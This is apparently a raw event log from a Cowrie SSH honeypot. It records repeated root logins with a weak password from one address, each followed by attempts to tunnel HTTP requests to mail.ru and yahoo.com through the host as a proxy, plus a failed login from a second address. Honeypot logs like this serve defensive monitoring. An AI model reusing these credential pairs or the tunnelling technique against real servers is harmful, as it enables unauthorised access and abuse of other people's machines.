{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:47.862959Z","src_ip":"77.83.207.83","session":"c3fcd8f15239"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45792,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7bc6b8e8ecc","protocol":"ssh","message":"New connection: 77.83.207.83:45792 (1.2.3.4:22) [session: b7bc6b8e8ecc]","sensor":"my-vps","timestamp":"2025-08-31T03:53:47.916234Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:47.917067Z","src_ip":"77.83.207.83","session":"b7bc6b8e8ecc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:47.970905Z","src_ip":"77.83.207.83","session":"b7bc6b8e8ecc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:48.238002Z","src_ip":"77.83.207.83","session":"b7bc6b8e8ecc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":22280,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:22280","sensor":"my-vps","timestamp":"2025-08-31T03:53:48.292509Z","session":"b7bc6b8e8ecc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:48.346108Z","src_ip":"77.83.207.83","session":"b7bc6b8e8ecc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":10267,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:10267","sensor":"my-vps","timestamp":"2025-08-31T03:53:48.495948Z","session":"b7bc6b8e8ecc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:48.549971Z","src_ip":"77.83.207.83","session":"b7bc6b8e8ecc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":11740,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:11740","sensor":"my-vps","timestamp":"2025-08-31T03:53:48.699895Z","session":"b7bc6b8e8ecc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:48.753548Z","src_ip":"77.83.207.83","session":"b7bc6b8e8ecc"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:48.807882Z","src_ip":"77.83.207.83","session":"b7bc6b8e8ecc"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45882,"dst_ip":"1.2.3.4","dst_port":22,"session":"88d8a7f11e4f","protocol":"ssh","message":"New connection: 77.83.207.83:45882 (1.2.3.4:22) [session: 88d8a7f11e4f]","sensor":"my-vps","timestamp":"2025-08-31T03:53:48.857344Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:48.858268Z","src_ip":"77.83.207.83","session":"88d8a7f11e4f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:48.908884Z","src_ip":"77.83.207.83","session":"88d8a7f11e4f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:49.159713Z","src_ip":"77.83.207.83","session":"88d8a7f11e4f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":26283,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:26283","sensor":"my-vps","timestamp":"2025-08-31T03:53:49.210713Z","session":"88d8a7f11e4f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:49.261218Z","src_ip":"77.83.207.83","session":"88d8a7f11e4f"}
{"eventid":"cowrie.login.failed","username":"master","password":"password1","message":"login attempt [master/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T03:53:49.389142Z","src_ip":"212.227.235.229","session":"1c05616b5148"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":20426,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:20426","sensor":"my-vps","timestamp":"2025-08-31T03:53:49.404416Z","session":"88d8a7f11e4f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:53:49.405410Z","src_ip":"212.227.235.229","session":"e2130d27f754"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:53:49.405883Z","src_ip":"212.227.235.229","session":"e2130d27f754"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:49.454737Z","src_ip":"77.83.207.83","session":"88d8a7f11e4f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":23292,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:23292","sensor":"my-vps","timestamp":"2025-08-31T03:53:49.596670Z","session":"88d8a7f11e4f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:49.647070Z","src_ip":"77.83.207.83","session":"88d8a7f11e4f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:49.698750Z","src_ip":"77.83.207.83","session":"88d8a7f11e4f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45979,"dst_ip":"1.2.3.4","dst_port":22,"session":"9879de6387fc","protocol":"ssh","message":"New connection: 77.83.207.83:45979 (1.2.3.4:22) [session: 9879de6387fc]","sensor":"my-vps","timestamp":"2025-08-31T03:53:49.747217Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:49.747940Z","src_ip":"77.83.207.83","session":"9879de6387fc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:49.798251Z","src_ip":"77.83.207.83","session":"9879de6387fc"}
{"eventid":"cowrie.session.closed","duration":12.768568277359009,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:50.040387Z","src_ip":"212.227.235.229","session":"10282263a673"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:50.046513Z","src_ip":"77.83.207.83","session":"9879de6387fc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1583,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:1583","sensor":"my-vps","timestamp":"2025-08-31T03:53:50.097065Z","session":"9879de6387fc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:50.148093Z","src_ip":"77.83.207.83","session":"9879de6387fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39852,"dst_ip":"1.2.3.4","dst_port":23,"session":"248f20119b8c","protocol":"telnet","message":"New connection: 212.227.235.229:39852 (1.2.3.4:23) [session: 248f20119b8c]","sensor":"my-vps","timestamp":"2025-08-31T03:53:50.272014Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19833,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:19833","sensor":"my-vps","timestamp":"2025-08-31T03:53:50.288084Z","session":"9879de6387fc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:50.337959Z","src_ip":"77.83.207.83","session":"9879de6387fc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":12776,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:12776","sensor":"my-vps","timestamp":"2025-08-31T03:53:50.480177Z","session":"9879de6387fc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:50.530037Z","src_ip":"77.83.207.83","session":"9879de6387fc"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:50.580842Z","src_ip":"77.83.207.83","session":"9879de6387fc"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46084,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b3713c5ef0a","protocol":"ssh","message":"New connection: 77.83.207.83:46084 (1.2.3.4:22) [session: 8b3713c5ef0a]","sensor":"my-vps","timestamp":"2025-08-31T03:53:50.630758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:50.631709Z","src_ip":"77.83.207.83","session":"8b3713c5ef0a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:50.682026Z","src_ip":"77.83.207.83","session":"8b3713c5ef0a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:50.932029Z","src_ip":"77.83.207.83","session":"8b3713c5ef0a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":9211,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:9211","sensor":"my-vps","timestamp":"2025-08-31T03:53:50.983286Z","session":"8b3713c5ef0a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:51.033879Z","src_ip":"77.83.207.83","session":"8b3713c5ef0a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22209,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:22209","sensor":"my-vps","timestamp":"2025-08-31T03:53:51.176540Z","session":"8b3713c5ef0a"}
{"eventid":"cowrie.session.closed","duration":"93.3","message":"Connection lost after 93.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:51.224653Z","src_ip":"212.227.235.229","session":"41c11ad8db47"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:51.227933Z","src_ip":"77.83.207.83","session":"8b3713c5ef0a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":26851,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:26851","sensor":"my-vps","timestamp":"2025-08-31T03:53:51.368431Z","session":"8b3713c5ef0a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:51.418603Z","src_ip":"77.83.207.83","session":"8b3713c5ef0a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:51.470497Z","src_ip":"77.83.207.83","session":"8b3713c5ef0a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46165,"dst_ip":"1.2.3.4","dst_port":22,"session":"dab19d4d7f47","protocol":"ssh","message":"New connection: 77.83.207.83:46165 (1.2.3.4:22) [session: dab19d4d7f47]","sensor":"my-vps","timestamp":"2025-08-31T03:53:51.519651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:51.520504Z","src_ip":"77.83.207.83","session":"dab19d4d7f47"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:51.543635Z","src_ip":"212.227.235.229","session":"1c05616b5148"}
